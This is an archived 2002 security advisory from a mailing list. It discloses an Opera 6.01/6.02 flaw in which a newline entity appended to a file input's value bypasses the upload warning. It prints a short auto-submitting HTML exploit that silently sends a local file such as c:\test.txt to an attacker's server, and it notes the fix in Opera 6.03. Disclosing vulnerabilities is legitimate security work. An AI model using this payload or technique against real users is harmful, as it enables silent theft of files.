[NT] Opera Allows Reading of Any Local File

From: support@securiteam.com
Date: 05/27/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 27 May 2002 18:31:33 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Opera Allows Reading of Any Local File
------------------------------------------------------------------------

SUMMARY

Opera, like all browsers today, supports the <input type="file"> element,
which is a standard method for users to upload files to HTTP servers.
Since the file element is a very security-sensitive element, most web
browsers do not allow its "value" attribute to be set (read only). If it
was possible to assign an arbitrary string to the "value" attribute, an
attacking server could fetch any local file by simply submitting a form
(through scripting or social engineering, if scripting has been disabled).

Opera's approach to the file element is a little different. The "value"
attribute can be set, but before the form it resides in is submitted, a
dialog comes up with the following warning:
"The files listed below have been selected, without your intervention, to
be sent to another computer. Do you want to send these files?"

DETAILS

Vulnerable systems:
 * Opera version 6.01
 * Opera version 6.02

It is possible to bypass the file element's confirmation dialog, which
means an attacker can download any file from an unsuspecting Opera user.

By appending a simple "&#10;" (HTML entity, which represents the ASCII
code for a new-line character) to the end of the file element's "value"
attribute, Opera's security algorithm is fooled to think that no files
were assigned. Therefore, the warning dialog does not come up; Opera
simply submits the form with the desired file chosen by an attacker.

Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this
attack. Therefore, a change that occurred between version 6.0 and 6.01 is
the culprit. This also means that all of the non-windows versions are safe
(Opera did not release 6.01 for other platforms yet).

Exploit:
This exploit will automatically transfer the file "c:/test.txt" to an
attacking host, which can handle it using a server-side environment such
as ASP, PHP or other solutions. It does not require any user interaction:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body>

Solution:
Opera was informed on 15 May 2002 and confirmed our findings. A day later,
in the evening of 16 May 2002, Opera informed us that the vulnerability
was fixed and committed to Opera's own version control system.

On 27 May 2002, Opera released version 6.03, which addressed this issue.

Opera has been extremely responsive and quick to understand and patch this
vulnerability. They have shown that they truly do take security seriously.

Demonstration:
Before demonstrating, this issue there is a few things to understand:
 * In order to demonstrate how this vulnerability works, the content of
the file has to be transferred to our server.
 * Files from the demonstration will not be saved on our server under any
circumstances; they will be displayed to you and immediately removed.
 * Please try to use small files (under 50K) in order to test yourself.
There is simply no sense in using large files.
 * An "unencrypted submission" warning dialog may appear because
information is transmitted in an unencrypted manner; this is a standard
dialog for ANY unencrypted form submission, it is not directly related to
the vulnerability. If another dialog, regarding the files that were
submitted, does not appear after dismissing this warning then you are
vulnerable. A potential attacker would simply use SSL to avoid the
"unencrypted submission" dialog.

We put together two proof-of-concept demonstrations:
 <http://sec.greymagic.com/adv/gm001-op/opyank.asp> Simple: displays
properties and contents of "c:/test.txt".
 <http://sec.greymagic.com/adv/gm001-op/opyankadv.html> Advanced: lets the
user pick which file to view, using a simple text element.

ADDITIONAL INFORMATION

The information has been provided by <mailto:security@greymagic.com>
GreyMagic Software.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages